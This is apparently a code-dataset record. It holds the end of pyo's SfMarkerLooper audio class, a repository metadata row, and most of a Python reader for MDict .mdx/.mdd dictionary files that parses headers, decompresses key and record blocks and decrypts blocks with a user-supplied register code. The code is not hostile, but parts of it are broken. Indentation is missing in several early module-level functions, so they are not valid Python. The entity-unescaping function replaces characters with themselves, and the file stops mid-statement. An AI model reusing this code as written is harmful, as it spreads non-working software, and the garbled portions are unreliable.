    >>> rnd = RandInt(len(a.getMarkers()), 2)
    >>> a.mark = rnd

    """

    def __init__(self, path, speed=1, mark=0, interp=2, mul=1, add=0):
        pyoArgsAssert(self, "sOOiOO", path, speed, mark, interp, mul, add)
        PyoObject.__init__(self, mul, add)
        self._speed = speed
        self._mark = mark
        self._interp = interp
        path, speed, mark, interp, mul, add, lmax = convertArgsToLists(path, speed, mark, interp, mul, add)
        self._base_players = []
        self._base_objs = []
        self._snd_size, self._dur, self._snd_sr, self._snd_chnls, _format, _type = sndinfo(path[0])
        for i in range(lmax):
            # Read the MARK chunk from the AIFF header; a file without
            # readable markers yields an empty marker list.
            try:
                sf = aifc.open(wrap(path, i))
                markerstmp = sf.getmarkers()
                sf.close()
                self._markers = [m[1] for m in markerstmp]
            except Exception:
                self._markers = []
            self._base_players.append(
                SfMarkerLooper_base(
                    stringencode(wrap(path, i)), self._markers, wrap(speed, i), wrap(mark, i), wrap(interp, i)
                )
            )
        # One audio stream per channel of each player.
        for i in range(lmax * self._snd_chnls):
            j = i // self._snd_chnls
            self._base_objs.append(
                SfMarkerLoop_base(wrap(self._base_players, j), i % self._snd_chnls, wrap(mul, j), wrap(add, j))
            )
        self._init_play()

    def setSpeed(self, x):
        """
        Replace the `speed` attribute.

        :Args:

            x: float or PyoObject
                new `speed` attribute.

        """
        pyoArgsAssert(self, "O", x)
        self._speed = x
        x, lmax = convertArgsToLists(x)
        [obj.setSpeed(wrap(x, i)) for i, obj in enumerate(self._base_players)]

    def setMark(self, x):
        """
        Replace the `mark` attribute.

        :Args:

            x: float or PyoObject
                new `mark` attribute.

        """
        pyoArgsAssert(self, "O", x)
        self._mark = x
        x, lmax = convertArgsToLists(x)
        [obj.setMark(wrap(x, i)) for i, obj in enumerate(self._base_players)]

    def setInterp(self, x):
        """
        Replace the `interp` attribute.

        :Args:

            x: int {1, 2, 3, 4}
                new `interp` attribute.

        """
        pyoArgsAssert(self, "i", x)
        self._interp = x
        x, lmax = convertArgsToLists(x)
        [obj.setInterp(wrap(x, i)) for i, obj in enumerate(self._base_players)]

    def getMarkers(self):
        """
        Returns a list of marker time values in samples.
        """
        return self._markers

    def ctrl(self, map_list=None, title=None, wxnoserver=False):
        self._map_list = [
            SLMap(0.01, 2.0, "lin", "speed", self._speed),
            SLMap(0, len(self._markers) - 1, "lin", "mark", self._mark, "int"),
            SLMap(1, 4, "lin", "interp", self._interp, res="int", dataOnly=True),
            SLMapMul(self._mul),
        ]
        PyoObject.ctrl(self, map_list, title, wxnoserver)

    @property
    def speed(self):
        """float or PyoObject. Transposition factor."""
        return self._speed

    @speed.setter
    def speed(self, x):
        self.setSpeed(x)

    @property
    def mark(self):
        """float or PyoObject. Marker to loop."""
        # BUG FIX: the original returned self._marker, an attribute that is
        # never set (the setter stores self._mark), raising AttributeError.
        return self._mark

    @mark.setter
    def mark(self, x):
        self.setMark(x)

    @property
    def interp(self):
        """int {1, 2, 3, 4}. Interpolation method."""
        return self._interp

    @interp.setter
    def interp(self, x):
        self.setInterp(x)
|
belangeo/pyo
|
pyo/lib/players.py
|
Python
|
lgpl-3.0
| 20,439
|
[
"Gaussian"
] |
0a2886e650b3e500ec88f764e45c9dae3e4842f80c3ff3119e2a9a4591a04ed6
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# readmdict.py
# Octopus MDict Dictionary File (.mdx) and Resource File (.mdd) Analyser
#
# Copyright (C) 2012, 2013, 2015 Xiaoqiang Wang <xiaoqiangwang AT gmail DOT com>
#
# This program is a free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# You can get a copy of GNU General Public License along this program
# But you can always get it from http://www.gnu.org/licenses/gpl.txt
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from struct import pack, unpack
from io import BytesIO
import re
import sys
import json
from .ripemd128 import ripemd128
from .pureSalsa20 import Salsa20
from aqt.utils import showInfo, showText, tooltip
# zlib compression is used for engine version >=2.0
import zlib
# LZO compression is used for engine version < 2.0
try:
import lzo
except ImportError:
lzo = None
print("LZO compression support is not available")
# 2x3 compatible
if sys.hexversion >= 0x03000000:
unicode = str
def _unescape_entities(text):
"""
unescape offending tags < > " &
"""
text = text.replace(b'<', b'<')
text = text.replace(b'>', b'>')
text = text.replace(b'"', b'"')
text = text.replace(b'&', b'&')
return text
def _fast_decrypt(data, key):
b = bytearray(data)
key = bytearray(key)
previous = 0x36
for i in range(len(b)):
t = (b[i] >> 4 | b[i] << 4) & 0xff
t = t ^ previous ^ (i & 0xff) ^ key[i % len(key)]
previous = b[i]
b[i] = t
return bytes(b)
def _mdx_decrypt(comp_block):
    """
    Decrypt an MDX key-info block (encryption flag 0x02).

    The key is the ripemd128 digest of the block's checksum field
    salted with the fixed little-endian constant 0x3695; the first
    8 header bytes are kept in clear.
    """
    salt = comp_block[4:8] + pack(b'<L', 0x3695)
    decrypt_key = ripemd128(salt)
    return comp_block[0:8] + _fast_decrypt(comp_block[8:], decrypt_key)
def _salsa_decrypt(ciphertext, encrypt_key):
    """
    Decrypt *ciphertext* with Salsa20/8 and a zero IV, as used by MDX.

    Salsa20 is a stream cipher, so encrypting the ciphertext again with
    the same key stream yields the plaintext.
    """
    cipher = Salsa20(key=encrypt_key, IV=b"\x00" * 8, rounds=8)
    return cipher.encryptBytes(ciphertext)
def _decrypt_regcode_by_deviceid(reg_code, deviceid):
    """
    Derive the block-encryption key from a register code bound to a device id.
    """
    digest = ripemd128(deviceid)
    cipher = Salsa20(key=digest, IV=b"\x00" * 8, rounds=8)
    return cipher.encryptBytes(reg_code)
def _decrypt_regcode_by_email(reg_code, email):
    """
    Derive the block-encryption key from a register code bound to an e-mail.

    The e-mail address is hashed in UTF-16-LE, matching the MDX builder.
    """
    digest = ripemd128(email.decode().encode('utf-16-le'))
    cipher = Salsa20(key=digest, IV=b"\x00" * 8, rounds=8)
    return cipher.encryptBytes(reg_code)
class MDict(object):
    """
    Base class which reads in header and key block.

    It has no public methods and serves only as code sharing base class.
    """

    def __init__(self, fname, encoding='', passcode=None, only_header=False):
        self._fname = fname
        self._encoding = encoding.upper()
        self._passcode = passcode
        self.header = self._read_header()
        if only_header:
            return
        try:
            self._key_list = self._read_keys()
        except Exception:
            # The size fields may be encrypted or garbled; fall back to
            # scanning the file for the key block magic bytes.
            print("Try Brutal Force on Encrypted Key Blocks")
            self._key_list = self._read_keys_brutal()

    def __len__(self):
        return self._num_entries

    def __iter__(self):
        return self.keys()

    def keys(self):
        """
        Return an iterator over dictionary keys.
        """
        return (key_value for key_id, key_value in self._key_list)

    def _read_number(self, f):
        # Sizes/offsets are 4-byte big-endian before engine v2.0 and
        # 8-byte big-endian afterwards (set in _read_header).
        return unpack(self._number_format, f.read(self._number_width))[0]

    def _parse_header(self, header):
        """
        Extract attributes from <Dict attr="value" ... > into a bytes->bytes dict.
        """
        # rb'' raw pattern: b'(\w+)' raises an invalid-escape warning.
        taglist = re.findall(rb'(\w+)="(.*?)"', header, re.DOTALL)
        tagdict = {}
        for key, value in taglist:
            tagdict[key] = _unescape_entities(value)
        return tagdict

    def _decode_key_block_info(self, key_block_info_compressed):
        """
        Decode the key block index into a list of
        (compressed_size, decompressed_size) tuples, one per key block.
        """
        if self._version >= 2:
            # zlib compression
            assert(key_block_info_compressed[:4] == b'\x02\x00\x00\x00')
            # decrypt if needed
            if self._encrypt & 0x02:
                key_block_info_compressed = _mdx_decrypt(
                    key_block_info_compressed)
            # decompress
            key_block_info = zlib.decompress(key_block_info_compressed[8:])
            # adler checksum
            adler32 = unpack('>I', key_block_info_compressed[4:8])[0]
            assert(adler32 == zlib.adler32(key_block_info) & 0xffffffff)
        else:
            # no compression
            key_block_info = key_block_info_compressed
        # decode
        key_block_info_list = []
        num_entries = 0
        i = 0
        if self._version >= 2:
            byte_format = '>H'
            byte_width = 2
            text_term = 1
        else:
            byte_format = '>B'
            byte_width = 1
            text_term = 0
        while i < len(key_block_info):
            # number of entries in current key block
            num_entries += unpack(self._number_format,
                                  key_block_info[i:i + self._number_width])[0]
            i += self._number_width
            # text head size
            text_head_size = unpack(byte_format, key_block_info[
                i:i + byte_width])[0]
            i += byte_width
            # text head (skipped; UTF-16 stores two bytes per code unit)
            if self._encoding != 'UTF-16':
                i += text_head_size + text_term
            else:
                i += (text_head_size + text_term) * 2
            # text tail size
            text_tail_size = unpack(byte_format, key_block_info[
                i:i + byte_width])[0]
            i += byte_width
            # text tail (skipped)
            if self._encoding != 'UTF-16':
                i += text_tail_size + text_term
            else:
                i += (text_tail_size + text_term) * 2
            # key block compressed size
            key_block_compressed_size = unpack(self._number_format, key_block_info[
                i:i + self._number_width])[0]
            i += self._number_width
            # key block decompressed size
            key_block_decompressed_size = unpack(self._number_format, key_block_info[
                i:i + self._number_width])[0]
            i += self._number_width
            key_block_info_list += [(key_block_compressed_size,
                                     key_block_decompressed_size)]
        assert(num_entries == self._num_entries)
        return key_block_info_list

    def _decode_key_block(self, key_block_compressed, key_block_info_list):
        """
        Decompress every key block and collect (offset, key_text) pairs.
        """
        key_list = []
        i = 0
        for compressed_size, decompressed_size in key_block_info_list:
            start = i
            end = i + compressed_size
            # 4 bytes : compression type
            key_block_type = key_block_compressed[start:start + 4]
            # 4 bytes : adler checksum of decompressed key block
            adler32 = unpack('>I', key_block_compressed[
                start + 4:start + 8])[0]
            if key_block_type == b'\x00\x00\x00\x00':
                key_block = key_block_compressed[start + 8:end]
            elif key_block_type == b'\x01\x00\x00\x00':
                if lzo is None:
                    print("LZO compression is not supported")
                    break
                # decompress key block (removed the unused hand-built
                # b'\xf0' + size header; initSize carries that information)
                key_block = lzo.decompress(key_block_compressed[
                    start + 8:end], initSize=decompressed_size, blockSize=1308672)
            elif key_block_type == b'\x02\x00\x00\x00':
                # decompress key block
                key_block = zlib.decompress(
                    key_block_compressed[start + 8:end])
            # extract one single key block into a key list
            key_list += self._split_key_block(key_block)
            # notice that adler32 returns signed value
            assert(adler32 == zlib.adler32(key_block) & 0xffffffff)
            i += compressed_size
        return key_list

    def _split_key_block(self, key_block):
        """
        Split a decompressed key block into (offset, key_text) pairs.

        Each record is a number (record offset) followed by a
        NUL-terminated key text (two NUL bytes for UTF-16).
        """
        key_list = []
        key_start_index = 0
        while key_start_index < len(key_block):
            # the corresponding record's offset in record block
            key_id = unpack(self._number_format, key_block[
                key_start_index:key_start_index + self._number_width])[0]
            # key text ends with '\x00'
            if self._encoding == 'UTF-16':
                delimiter = b'\x00\x00'
                width = 2
            else:
                delimiter = b'\x00'
                width = 1
            i = key_start_index + self._number_width
            while i < len(key_block):
                if key_block[i:i + width] == delimiter:
                    key_end_index = i
                    break
                i += width
            key_text = key_block[key_start_index + self._number_width:key_end_index]\
                .decode(self._encoding, errors='ignore').encode('utf-8').strip()
            key_start_index = key_end_index + width
            key_list += [(key_id, key_text)]
        return key_list

    @property
    def meta(self):
        """Dictionary metadata extracted from the header."""
        return {'title': self._title, 'description': self._description,
                'encoding': self._encoding, 'version': self._version,
                'stylesheet': json.dumps(self._stylesheet)}

    def _read_header(self):
        """
        Parse the file header, set encoding/version/encryption state and
        return the header attributes as a dict.
        """
        f = open(self._fname, 'rb')
        # number of bytes of header text
        header_bytes_size = unpack('>I', f.read(4))[0]
        header_bytes = f.read(header_bytes_size)
        # 4 bytes: adler32 checksum of header, in little endian
        adler32 = unpack('<I', f.read(4))[0]
        assert(adler32 == zlib.adler32(header_bytes) & 0xffffffff)
        # mark down key block offset
        self._key_block_offset = f.tell()
        f.close()
        # header text in utf-16 encoding ending with '\x00\x00'
        header_text = header_bytes[:-2].decode('utf-16').encode('utf-8')
        header_tag = self._parse_header(header_text)
        if not self._encoding:
            encoding = header_tag[b'Encoding']
            if sys.hexversion >= 0x03000000:
                encoding = encoding.decode('utf-8')
            # GB18030 > GBK > GB2312
            if encoding in ['GBK', 'GB2312']:
                encoding = 'GB18030'
            self._encoding = encoding
        # title and description (may be absent from the header)
        if b'Title' in header_tag:
            self._title = header_tag[b'Title'].decode('utf-8')
        else:
            self._title = ''
        if b'Description' in header_tag:
            self._description = header_tag[b'Description'].decode('utf-8')
        else:
            self._description = ''
        # encryption flag
        #   0x00 - no encryption
        #   0x01 - encrypt record block
        #   0x02 - encrypt key info block
        if b'Encrypted' not in header_tag or header_tag[b'Encrypted'] == b'No':
            self._encrypt = 0
        elif header_tag[b'Encrypted'] == b'Yes':
            self._encrypt = 1
        else:
            self._encrypt = int(header_tag[b'Encrypted'])
        # stylesheet attribute if present takes form of:
        #   style_number # 1-255
        #   style_begin  # or ''
        #   style_end    # or ''
        # store stylesheet in dict in the form of
        # {'number' : ('style_begin', 'style_end')}
        self._stylesheet = {}
        # BUG FIX: header_tag keys are bytes; the original looked up the str
        # key 'StyleSheet', which never matched, so the stylesheet was
        # silently dropped.  Values are decoded so json.dumps in `meta` works.
        if header_tag.get(b'StyleSheet'):
            lines = header_tag[b'StyleSheet'].decode('utf-8').splitlines()
            for i in range(0, len(lines), 3):
                self._stylesheet[lines[i]] = (lines[i + 1], lines[i + 2])
        # before version 2.0, number is 4 bytes integer
        # version 2.0 and above uses 8 bytes
        self._version = float(header_tag[b'GeneratedByEngineVersion'])
        if self._version < 2.0:
            self._number_width = 4
            self._number_format = '>I'
        else:
            self._number_width = 8
            self._number_format = '>Q'
        return header_tag

    def _read_keys(self):
        """
        Read and decode the key section; return a list of (offset, key) pairs.
        """
        f = open(self._fname, 'rb')
        f.seek(self._key_block_offset)
        # the following numbers could be encrypted
        if self._version >= 2.0:
            num_bytes = 8 * 5
        else:
            num_bytes = 4 * 4
        block = f.read(num_bytes)
        if self._encrypt & 1:
            if self._passcode is None:
                raise RuntimeError(
                    'user identification is needed to read encrypted file')
            regcode, userid = self._passcode
            if isinstance(userid, unicode):
                userid = userid.encode('utf8')
            if self.header[b'RegisterBy'] == b'EMail':
                encrypted_key = _decrypt_regcode_by_email(regcode, userid)
            else:
                encrypted_key = _decrypt_regcode_by_deviceid(regcode, userid)
            block = _salsa_decrypt(block, encrypted_key)
        # decode this block
        sf = BytesIO(block)
        # number of key blocks
        num_key_blocks = self._read_number(sf)
        # number of entries
        self._num_entries = self._read_number(sf)
        # number of bytes of key block info after decompression
        if self._version >= 2.0:
            key_block_info_decomp_size = self._read_number(sf)
        # number of bytes of key block info
        key_block_info_size = self._read_number(sf)
        # number of bytes of key block
        key_block_size = self._read_number(sf)
        # 4 bytes: adler checksum of previous 5 numbers
        if self._version >= 2.0:
            adler32 = unpack('>I', f.read(4))[0]
            assert adler32 == (zlib.adler32(block) & 0xffffffff)
        # read key block info, which indicates key block's compressed and
        # decompressed size
        key_block_info = f.read(key_block_info_size)
        key_block_info_list = self._decode_key_block_info(key_block_info)
        assert(num_key_blocks == len(key_block_info_list))
        # read key block
        key_block_compressed = f.read(key_block_size)
        # extract key block
        key_list = self._decode_key_block(
            key_block_compressed, key_block_info_list)
        self._record_block_offset = f.tell()
        f.close()
        return key_list

    def _read_keys_brutal(self):
        """
        Fallback key reader: ignore the (possibly encrypted) size fields and
        scan the file for the key block magic bytes instead.
        """
        f = open(self._fname, 'rb')
        f.seek(self._key_block_offset)
        # the following numbers could be encrypted, disregard them!
        if self._version >= 2.0:
            num_bytes = 8 * 5 + 4
            key_block_type = b'\x02\x00\x00\x00'
        else:
            num_bytes = 4 * 4
            key_block_type = b'\x01\x00\x00\x00'
        block = f.read(num_bytes)
        # key block info
        # 4 bytes '\x02\x00\x00\x00'
        # 4 bytes adler32 checksum
        # unknown number of bytes follows until '\x02\x00\x00\x00' which marks
        # the beginning of key block
        key_block_info = f.read(8)
        if self._version >= 2.0:
            assert key_block_info[:4] == b'\x02\x00\x00\x00'
        while True:
            fpos = f.tell()
            t = f.read(1024)
            index = t.find(key_block_type)
            if index != -1:
                key_block_info += t[:index]
                f.seek(fpos + index)
                break
            else:
                key_block_info += t
        key_block_info_list = self._decode_key_block_info(key_block_info)
        key_block_size = sum(list(zip(*key_block_info_list))[0])
        # read key block
        key_block_compressed = f.read(key_block_size)
        # extract key block
        key_list = self._decode_key_block(
            key_block_compressed, key_block_info_list)
        self._record_block_offset = f.tell()
        f.close()
        self._num_entries = len(key_list)
        return key_list
class MDD(MDict):
    """
    MDict resource file format (*.MDD) reader.

    >>> mdd = MDD('example.mdd')
    >>> len(mdd)
    208
    >>> for filename, content in mdd.items():
    ...     print(filename, content[:10])
    """

    def __init__(self, fname, passcode=None):
        # MDD payloads are filenames encoded as UTF-16 keys.
        MDict.__init__(self, fname, encoding='UTF-16', passcode=passcode)

    def items(self):
        """Return a generator which in turn produce tuples in the form of (filename, content)
        """
        return self._decode_record_block()

    def _decode_record_block(self):
        """Yield ``(filename, data)`` tuples decoded from the record section."""
        f = open(self._fname, 'rb')
        f.seek(self._record_block_offset)

        num_record_blocks = self._read_number(f)
        num_entries = self._read_number(f)
        assert(num_entries == self._num_entries)
        record_block_info_size = self._read_number(f)
        record_block_size = self._read_number(f)

        # record block info section: (compressed, decompressed) size pairs
        record_block_info_list = []
        size_counter = 0
        for i in range(num_record_blocks):
            compressed_size = self._read_number(f)
            decompressed_size = self._read_number(f)
            record_block_info_list += [(compressed_size, decompressed_size)]
            size_counter += self._number_width * 2
        assert(size_counter == record_block_info_size)

        # actual record blocks
        offset = 0
        i = 0
        size_counter = 0
        for compressed_size, decompressed_size in record_block_info_list:
            record_block_compressed = f.read(compressed_size)
            # 4 bytes: compression type
            record_block_type = record_block_compressed[:4]
            # 4 bytes: adler32 checksum of decompressed record block
            adler32 = unpack('>I', record_block_compressed[4:8])[0]
            if record_block_type == b'\x00\x00\x00\x00':
                # no compression
                record_block = record_block_compressed[8:]
            elif record_block_type == b'\x01\x00\x00\x00':
                if lzo is None:
                    print("LZO compression is not supported")
                    break
                # BUGFIX: the payload starts right after the 8-byte
                # type/checksum header; the previous slice used the
                # undefined names `start` and `end` (NameError at runtime).
                record_block = lzo.decompress(
                    record_block_compressed[8:],
                    initSize=decompressed_size, blockSize=1308672)
            elif record_block_type == b'\x02\x00\x00\x00':
                # zlib compression
                record_block = zlib.decompress(record_block_compressed[8:])
            # notice that adler32 returns a signed value
            assert(adler32 == zlib.adler32(record_block) & 0xffffffff)
            assert(len(record_block) == decompressed_size)
            # split record block according to the offset info from key block
            while i < len(self._key_list):
                record_start, key_text = self._key_list[i]
                # reached the end of current record block
                if record_start - offset >= len(record_block):
                    break
                # record end index
                if i < len(self._key_list) - 1:
                    record_end = self._key_list[i + 1][0]
                else:
                    record_end = len(record_block) + offset
                i += 1
                data = record_block[record_start - offset:record_end - offset]
                yield key_text, data
            offset += len(record_block)
            size_counter += compressed_size
        assert(size_counter == record_block_size)
        f.close()

    # Build an index of the MDD file. Each entry holds:
    #   key_text          (the key; also derivable from the key list)
    #   file_pos          (offset where the record_block starts)
    #   compressed_size   (record_block size before decompression)
    #   decompressed_size (size after decompression)
    #   record_block_type (compression type of the record_block)
    #   record_start      (these three locate one record inside the
    #   record_end         decompressed record_block and can be stored
    #   offset             directly)
    def get_index(self, check_block=True):
        """Return a list of index dicts describing where each record lives.

        When *check_block* is True the record blocks are decompressed and
        their adler32 checksums verified as the index is built.
        """
        f = open(self._fname, 'rb')
        index_dict_list = []
        f.seek(self._record_block_offset)

        num_record_blocks = self._read_number(f)
        num_entries = self._read_number(f)
        assert(num_entries == self._num_entries)
        record_block_info_size = self._read_number(f)
        record_block_size = self._read_number(f)

        # record block info section
        record_block_info_list = []
        size_counter = 0
        for i in range(num_record_blocks):
            compressed_size = self._read_number(f)
            decompressed_size = self._read_number(f)
            record_block_info_list += [(compressed_size, decompressed_size)]
            size_counter += self._number_width * 2
        # TODO: re-check this size assertion on unusual files
        assert(size_counter == record_block_info_size)

        # actual record blocks
        offset = 0
        i = 0
        size_counter = 0
        for compressed_size, decompressed_size in record_block_info_list:
            current_pos = f.tell()
            record_block_compressed = f.read(compressed_size)
            # 4 bytes: compression type
            record_block_type = record_block_compressed[:4]
            # 4 bytes: adler32 checksum of decompressed record block
            adler32 = unpack('>I', record_block_compressed[4:8])[0]
            if record_block_type == b'\x00\x00\x00\x00':
                _type = 0
                if check_block:
                    record_block = record_block_compressed[8:]
            elif record_block_type == b'\x01\x00\x00\x00':
                _type = 1
                if lzo is None:
                    print("LZO compression is not supported")
                    break
                # BUGFIX: slice from byte 8 onward; `start`/`end` were
                # undefined names in the original code.
                if check_block:
                    record_block = lzo.decompress(
                        record_block_compressed[8:],
                        initSize=decompressed_size, blockSize=1308672)
            elif record_block_type == b'\x02\x00\x00\x00':
                _type = 2
                if check_block:
                    record_block = zlib.decompress(record_block_compressed[8:])
            # notice that adler32 returns a signed value
            if check_block:
                assert(adler32 == zlib.adler32(record_block) & 0xffffffff)
                assert(len(record_block) == decompressed_size)
            # split record block according to the offset info from key block
            while i < len(self._key_list):
                # fresh dict to hold this record's index info
                index_dict = {}
                index_dict['file_pos'] = current_pos
                index_dict['compressed_size'] = compressed_size
                index_dict['decompressed_size'] = decompressed_size
                index_dict['record_block_type'] = _type
                record_start, key_text = self._key_list[i]
                index_dict['record_start'] = record_start
                index_dict['key_text'] = key_text.decode(
                    "utf-8", errors='ignore')
                index_dict['offset'] = offset
                # reached the end of current record block
                if record_start - offset >= decompressed_size:
                    break
                # record end index
                if i < len(self._key_list) - 1:
                    record_end = self._key_list[i + 1][0]
                else:
                    record_end = decompressed_size + offset
                index_dict['record_end'] = record_end
                i += 1
                if check_block:
                    # touch the data to make sure the slice is valid
                    data = record_block[
                        record_start - offset:record_end - offset]
                index_dict_list.append(index_dict)
            offset += decompressed_size
            size_counter += compressed_size
        assert(size_counter == record_block_size)
        f.close()
        return index_dict_list
class MDX(MDict):
    """
    MDict dictionary file format (*.MDX) reader.

    >>> mdx = MDX('example.mdx')
    >>> len(mdx)
    42481
    >>> for key, value in mdx.items():
    ...     print(key, value[:10])
    """

    def __init__(self, fname, encoding='', substyle=False, passcode=None, only_header=False):
        MDict.__init__(self, fname, encoding, passcode, only_header)
        # Whether to expand `N` stylesheet markers in record text.
        self._substyle = substyle

    def items(self):
        """Return a generator which in turn produce tuples in the form of (key, value)
        """
        return self._decode_record_block()

    def _substitute_stylesheet(self, txt):
        """Replace ``\\`N\\``` markers in *txt* with the stylesheet's
        opening/closing fragments for entry N."""
        # substitute stylesheet definition (raw strings: \d is an
        # invalid escape in a plain string literal on Python 3.12+)
        txt_list = re.split(r'`\d+`', txt)
        txt_tag = re.findall(r'`\d+`', txt)
        txt_styled = txt_list[0]
        for j, p in enumerate(txt_list[1:]):
            style = self._stylesheet[txt_tag[j][1:-1]]
            if p and p[-1] == '\n':
                txt_styled = txt_styled + \
                    style[0] + p.rstrip() + style[1] + '\r\n'
            else:
                txt_styled = txt_styled + style[0] + p + style[1]
        return txt_styled

    def _decode_record_block(self):
        """Yield ``(key, record)`` tuples; records are re-encoded to UTF-8."""
        f = open(self._fname, 'rb')
        f.seek(self._record_block_offset)

        num_record_blocks = self._read_number(f)
        num_entries = self._read_number(f)
        assert(num_entries == self._num_entries)
        record_block_info_size = self._read_number(f)
        record_block_size = self._read_number(f)

        # record block info section
        record_block_info_list = []
        size_counter = 0
        for i in range(num_record_blocks):
            compressed_size = self._read_number(f)
            decompressed_size = self._read_number(f)
            record_block_info_list += [(compressed_size, decompressed_size)]
            size_counter += self._number_width * 2
        assert(size_counter == record_block_info_size)

        # actual record block data
        offset = 0
        i = 0
        size_counter = 0
        for compressed_size, decompressed_size in record_block_info_list:
            # To re-read this block later one only needs compressed_size
            # and the current file position (f.tell() / f.seek() when
            # building an index).
            record_block_compressed = f.read(compressed_size)
            # 4 bytes indicate the block compression type
            record_block_type = record_block_compressed[:4]
            # 4 bytes adler checksum of uncompressed content
            adler32 = unpack('>I', record_block_compressed[4:8])[0]
            # no compression
            if record_block_type == b'\x00\x00\x00\x00':
                record_block = record_block_compressed[8:]
            # lzo compression
            elif record_block_type == b'\x01\x00\x00\x00':
                if lzo is None:
                    print("LZO compression is not supported")
                    break
                record_block = lzo.decompress(record_block_compressed[
                    8:], initSize=decompressed_size, blockSize=1308672)
            # zlib compression
            elif record_block_type == b'\x02\x00\x00\x00':
                record_block = zlib.decompress(record_block_compressed[8:])
            # record_block is recovered by one of the three methods above;
            # the inputs are record_block_compressed, decompressed_size and
            # record_block_type, plus the adler32 checksum for verification.
            # notice that adler32 returns a signed value
            assert(adler32 == zlib.adler32(record_block) & 0xffffffff)
            assert(len(record_block) == decompressed_size)
            # split record block according to the offset info from key block
            while i < len(self._key_list):
                record_start, key_text = self._key_list[i]
                # reached the end of current record block
                if record_start - offset >= len(record_block):
                    break
                # record end index
                if i < len(self._key_list) - 1:
                    record_end = self._key_list[i + 1][0]
                else:
                    record_end = len(record_block) + offset
                i += 1
                # slice this record out of the decompressed block
                record = record_block[
                    record_start - offset:record_end - offset]
                # convert to utf-8
                record = record.decode(self._encoding, errors='ignore').strip(
                    u'\x00').encode('utf-8')
                # optionally substitute styles
                if self._substyle and self._stylesheet:
                    record = self._substitute_stylesheet(record)
                yield key_text, record
            offset += len(record_block)
            size_counter += compressed_size
        assert(size_counter == record_block_size)
        f.close()

    # Build an index of the MDX file. Each entry holds:
    #   key_text          (the key; also derivable from the key list)
    #   file_pos          (offset where the record_block starts)
    #   compressed_size   (record_block size before decompression)
    #   decompressed_size (size after decompression)
    #   record_block_type (compression type of the record_block)
    #   record_start      (these three locate one record inside the
    #   record_end         decompressed record_block and can be stored
    #   offset             directly)
    def get_index(self, check_block=True):
        """Return a list of index dicts describing where each record lives.

        When *check_block* is True the record blocks are decompressed and
        their adler32 checksums verified as the index is built.
        """
        index_dict_list = []
        f = open(self._fname, 'rb')
        f.seek(self._record_block_offset)

        num_record_blocks = self._read_number(f)
        num_entries = self._read_number(f)
        assert(num_entries == self._num_entries)
        record_block_info_size = self._read_number(f)
        record_block_size = self._read_number(f)

        # record block info section
        record_block_info_list = []
        size_counter = 0
        for i in range(num_record_blocks):
            compressed_size = self._read_number(f)
            decompressed_size = self._read_number(f)
            record_block_info_list += [(compressed_size, decompressed_size)]
            size_counter += self._number_width * 2
        assert(size_counter == record_block_info_size)

        # actual record block data
        offset = 0
        i = 0
        size_counter = 0
        for compressed_size, decompressed_size in record_block_info_list:
            current_pos = f.tell()
            record_block_compressed = f.read(compressed_size)
            # 4 bytes indicate the block compression type
            record_block_type = record_block_compressed[:4]
            # 4 bytes adler checksum of uncompressed content
            adler32 = unpack('>I', record_block_compressed[4:8])[0]
            # no compression
            if record_block_type == b'\x00\x00\x00\x00':
                _type = 0
                record_block = record_block_compressed[8:]
            # lzo compression
            elif record_block_type == b'\x01\x00\x00\x00':
                _type = 1
                if lzo is None:
                    print("LZO compression is not supported")
                    break
                if check_block:
                    record_block = lzo.decompress(record_block_compressed[
                        8:], initSize=decompressed_size, blockSize=1308672)
            # zlib compression
            elif record_block_type == b'\x02\x00\x00\x00':
                _type = 2
                if check_block:
                    record_block = zlib.decompress(record_block_compressed[8:])
            # notice that adler32 returns a signed value
            if check_block:
                assert(adler32 == zlib.adler32(record_block) & 0xffffffff)
                assert(len(record_block) == decompressed_size)
            # split record block according to the offset info from key block
            while i < len(self._key_list):
                # fresh dict to hold this record's index info
                index_dict = {}
                index_dict['file_pos'] = current_pos
                index_dict['compressed_size'] = compressed_size
                index_dict['decompressed_size'] = decompressed_size
                index_dict['record_block_type'] = _type
                record_start, key_text = self._key_list[i]
                index_dict['record_start'] = record_start
                index_dict['key_text'] = key_text.decode(
                    'utf-8', errors='ignore')
                index_dict['offset'] = offset
                # reached the end of current record block
                if record_start - offset >= decompressed_size:
                    break
                # record end index
                if i < len(self._key_list) - 1:
                    record_end = self._key_list[i + 1][0]
                else:
                    record_end = decompressed_size + offset
                index_dict['record_end'] = record_end
                i += 1
                if check_block:
                    record = record_block[
                        record_start - offset:record_end - offset]
                    # convert to utf-8
                    record = record.decode(self._encoding, errors='ignore').strip(
                        u'\x00').encode('utf-8')
                    # optionally substitute styles
                    if self._substyle and self._stylesheet:
                        record = self._substitute_stylesheet(record)
                index_dict_list.append(index_dict)
            offset += decompressed_size
            size_counter += compressed_size
        # TODO: this assertion is intentionally disabled — it fails on
        # some files; investigate before re-enabling.
        #assert(size_counter == record_block_size)
        # BUGFIX: `f.close` without parentheses never closed the file.
        f.close()
        return index_dict_list
if __name__ == '__main__':
    # Command-line front end: dump an MDX to source text and extract the
    # companion MDD's embedded files.
    import sys
    import os
    import os.path
    import argparse
    import codecs

    def passcode(s):
        """argparse type: parse 'regcode,userid' into (bytes, str)."""
        try:
            regcode, userid = s.split(',')
        except ValueError:
            raise argparse.ArgumentTypeError("Passcode must be regcode,userid")
        try:
            regcode = codecs.decode(regcode, 'hex')
        except Exception:
            raise argparse.ArgumentTypeError(
                "regcode must be a 32 bytes hexadecimal string")
        return regcode, userid

    parser = argparse.ArgumentParser()
    parser.add_argument('-x', '--extract', action="store_true",
                        help='extract mdx to source format and extract files from mdd')
    parser.add_argument('-s', '--substyle', action="store_true",
                        help='substitute style definition if present')
    parser.add_argument('-d', '--datafolder', default="data",
                        help='folder to extract data files from mdd')
    parser.add_argument('-e', '--encoding', default="",
                        help='override the dictionary text encoding')
    parser.add_argument('-p', '--passcode', default=None, type=passcode,
                        help='register_code,email_or_deviceid')
    parser.add_argument("filename", nargs='?', help="mdx file name")
    args = parser.parse_args()

    # use GUI to select file, default to extract
    if not args.filename:
        import Tkinter
        import tkFileDialog
        root = Tkinter.Tk()
        root.withdraw()
        args.filename = tkFileDialog.askopenfilename(parent=root)
        args.extract = True

    if not os.path.exists(args.filename):
